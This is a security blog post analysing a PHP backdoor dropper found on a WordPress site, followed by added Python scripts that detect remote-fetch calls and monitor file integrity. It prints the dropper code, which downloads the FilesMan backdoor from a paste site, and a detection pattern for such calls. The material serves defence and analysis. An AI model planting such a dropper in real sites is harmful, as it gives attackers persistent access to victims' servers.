Sucuri Blog


Backdoor Uses Paste Site to Host Payload

September 18, 2018 | Bruno Zanelato


Finding backdoors is one of the biggest challenges for a website security analyst, because backdoors are designed to stay hidden in case the rest of the malware is found and removed.

Website Backdoors

A backdoor is a piece of malware that attackers leave behind to allow them access back into a website. Hackers like to inject code into different locations to increase their chances of retaining control of the website so they can reinfect it continuously.

Over the past year we have written a lot about new ways to decode complex malware built on common PHP functions like:

  • eval,
  • create_function,
  • preg_replace,
  • assert,
  • base64_decode.

According to our latest website hacked report, over the course of the previous year:

71% of all compromises had a PHP-based backdoor hidden within the site.

The effectiveness of these backdoors comes from their elusiveness to most website scanning technologies.

We have written many posts on backdoors and their effects. Today, we want to discuss some techniques that don’t follow any obfuscation tricks like encrypted strings, concatenations, and typecasting.

Unusual Backdoors

These unusual backdoors often look like legitimate code and can go unnoticed by most malware scanners available in the market.

However, during an incident response investigation, we detected an interesting backdoor that was small, simple and effective.

The backdoor was uploaded as the wp-content/themes/buildup/db.php file and looked like this:

<?php
if ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {
    echo "Copy_success";
} else {
    echo "Copy_failed";
}
?>

This small piece of code downloads the full malware from the hxxps://paste[.]ee website (if you are not familiar with that site, it is a Pastebin-like service with SSL and fewer controls).
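The dropper above is easy to spot mechanically because it hands a literal URL to copy(). The script below is an added example, not code from the post or from Sucuri: it walks a web root and flags PHP files that pass an http/https/ftp literal to copy(), file_get_contents(), fopen(), readfile(), curl_init() or include/require. The theme tree it scans and the placeholder paste URL inside it are constructed for the demo.

```python
"""Added example (not from the Sucuri post): flag PHP files that hand a
literal remote URL to a function that will fetch it, the pattern used by
the paste-site dropper above. Sample files below are constructed."""
import os
import re
import tempfile

# PHP functions that accept a stream-wrapper URL when allow_url_fopen is on,
# followed directly by a quoted http/https/ftp URL. include/require may be
# written without parentheses, so the paren is optional for them.
REMOTE_FETCH_RE = re.compile(
    r"""@?\b(?:copy|file_get_contents|fopen|file|readfile|curl_init)\s*\(\s*['"](?:https?|ftp)://"""
    r"""|\b(?:include|require)(?:_once)?\s*\(?\s*['"](?:https?|ftp)://""",
    re.IGNORECASE,
)


def scan_php_source(source: str) -> list:
    """Return (line_number, stripped_line) for every line that fetches a remote URL."""
    return [
        (lineno, line.strip())
        for lineno, line in enumerate(source.splitlines(), start=1)
        if REMOTE_FETCH_RE.search(line)
    ]


def scan_tree(root: str) -> dict:
    """Walk a web root and return {relative_path: hits} for suspicious PHP files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


# Constructed samples: a dropper shaped like the one in the post (placeholder
# URL, not the real paste link) and a benign theme file that reads local paths.
DROPPER = """<?php
if ( @copy('https://paste.example/r/PLACEHOLDER/0', 'db.php') ) {
    echo "Copy_success";
} else {
    echo "Copy_failed";
}
"""
BENIGN = """<?php
$css = file_get_contents( get_template_directory() . '/style.css' );
include 'inc/template-tags.php';
"""


def demo() -> dict:
    """Write the samples into a temporary theme directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "buildup")
        os.makedirs(theme)
        with open(os.path.join(theme, "db.php"), "w") as fh:
            fh.write(DROPPER)
        with open(os.path.join(theme, "functions.php"), "w") as fh:
            fh.write(BENIGN)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        for lineno, snippet in hits:
            print(f"{path}:{lineno}: {snippet}")
```

The check only catches a literal URL; a dropper that assembles the string at runtime slips past it, so pattern scanning complements file integrity monitoring rather than replacing it. Setting allow_url_fopen to Off in php.ini stops copy() and file_get_contents() from reading remote URLs at all, although the curl extension is unaffected by that setting.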

The downloaded code had been obfuscated with a free online tool, which is common: malware developers find such tools easily, and we also see legitimate code obfuscated with them.

[Image: Obfuscated code that downloads malware from a website]

Note to devs: Avoid using free tools because they may be saving your code.

And here’s the more “readable” code:

[Image: Code that downloads malware from a website]

As you may have noticed, this is a copy of the FilesMan backdoor, which is often hidden in the filesystem, making it hard to find without access to the server or its logs. Here a small file downloads the backdoor, and an untrained eye may overlook it.

How to Avoid Website Backdoors

Backdoors can be very hard to find and even harder to get rid of. To begin, it is highly advisable that you monitor your logs constantly for unexpected behavior.

In order to prevent the website from getting infected in the first place, we highly recommend implementing security measures like file integrity monitoring and a Website Application Firewall (WAF).
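A minimal version of the file integrity monitoring recommended above, written as an added example rather than Sucuri's own tooling: it hashes every file under a web root, stores the baseline as JSON outside that root, and reports files added, removed or modified since. The theme tree and the simulated compromise (a new db.php plus a tampered functions.php) are constructed for the demo.

```python
"""Added example (not from the Sucuri post): a minimal file integrity
monitor. It hashes every file under a web root, saves the baseline as
JSON, and reports files added, removed or modified since. The sample
tree is constructed; the simulated infection writes a db.php shaped like
the post's dropper, with a placeholder URL."""
import hashlib
import json
import os
import tempfile


def hash_file(path: str) -> str:
    """SHA-256 of a file, read in chunks so large uploads are not loaded into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: str) -> dict:
    """Map every file's path (relative to root, '/' separated) to its hash."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            baseline[rel] = hash_file(path)
    return baseline


def save_baseline(baseline: dict, path: str) -> None:
    with open(path, "w") as fh:
        json.dump(baseline, fh, indent=2, sort_keys=True)


def load_baseline(path: str) -> dict:
    with open(path) as fh:
        return json.load(fh)


def compare(baseline: dict, current: dict) -> dict:
    """Classify differences between a stored baseline and a fresh scan."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def _write(path: str, text: str, append: bool = False) -> None:
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "a" if append else "w") as fh:
        fh.write(text)


def demo() -> dict:
    """Baseline a clean theme, simulate the compromise, and diff the two scans."""
    with tempfile.TemporaryDirectory() as work:
        root = os.path.join(work, "htdocs")
        theme = os.path.join(root, "wp-content", "themes", "buildup")
        _write(os.path.join(theme, "functions.php"), "<?php\n// theme setup\n")
        _write(os.path.join(theme, "style.css"), "/* Theme Name: buildup */\n")

        # The baseline lives outside the web root: an attacker who can write
        # into htdocs should not be able to rewrite the baseline as well.
        baseline_path = os.path.join(work, "baseline.json")
        save_baseline(build_baseline(root), baseline_path)

        # Simulated compromise (constructed): a dropper appears and a theme file is altered.
        _write(os.path.join(theme, "db.php"),
               "<?php\nif ( @copy('https://paste.example/r/PLACEHOLDER/0', 'db.php') ) { echo 'Copy_success'; }\n")
        _write(os.path.join(theme, "functions.php"), "\n// appended by attacker\n", append=True)

        return compare(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run build_baseline right after a clean install or a verified clean-up, re-run it on a schedule, and treat any "added" PHP file under wp-content/themes or wp-content/uploads as something to read before dismissing; the db.php in this incident would have shown up there the first time the check ran after the upload.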

If you suspect that your website is infected with a backdoor, we have an experienced website security team that can clean up your website. If you are looking for a DIY solution, we have written a guide explaining How to Clean a Hacked Website.


Categories: Website Malware Infections, Website Security, WordPress Security
Tags: Black Hat Tactics, Website Backdoor, WordPress Plugins and Themes

About Bruno Zanelato

Bruno is the Website Firewall Manager at Sucuri. He has 15 years of experience deploying open-source security software, hardening systems, PCI compliance, and preventive measures for new exploitation techniques. He is currently a member of the Brazilian Snort community and of the OWASP Brazilian chapter. Find him on Twitter @braindeadlylabs
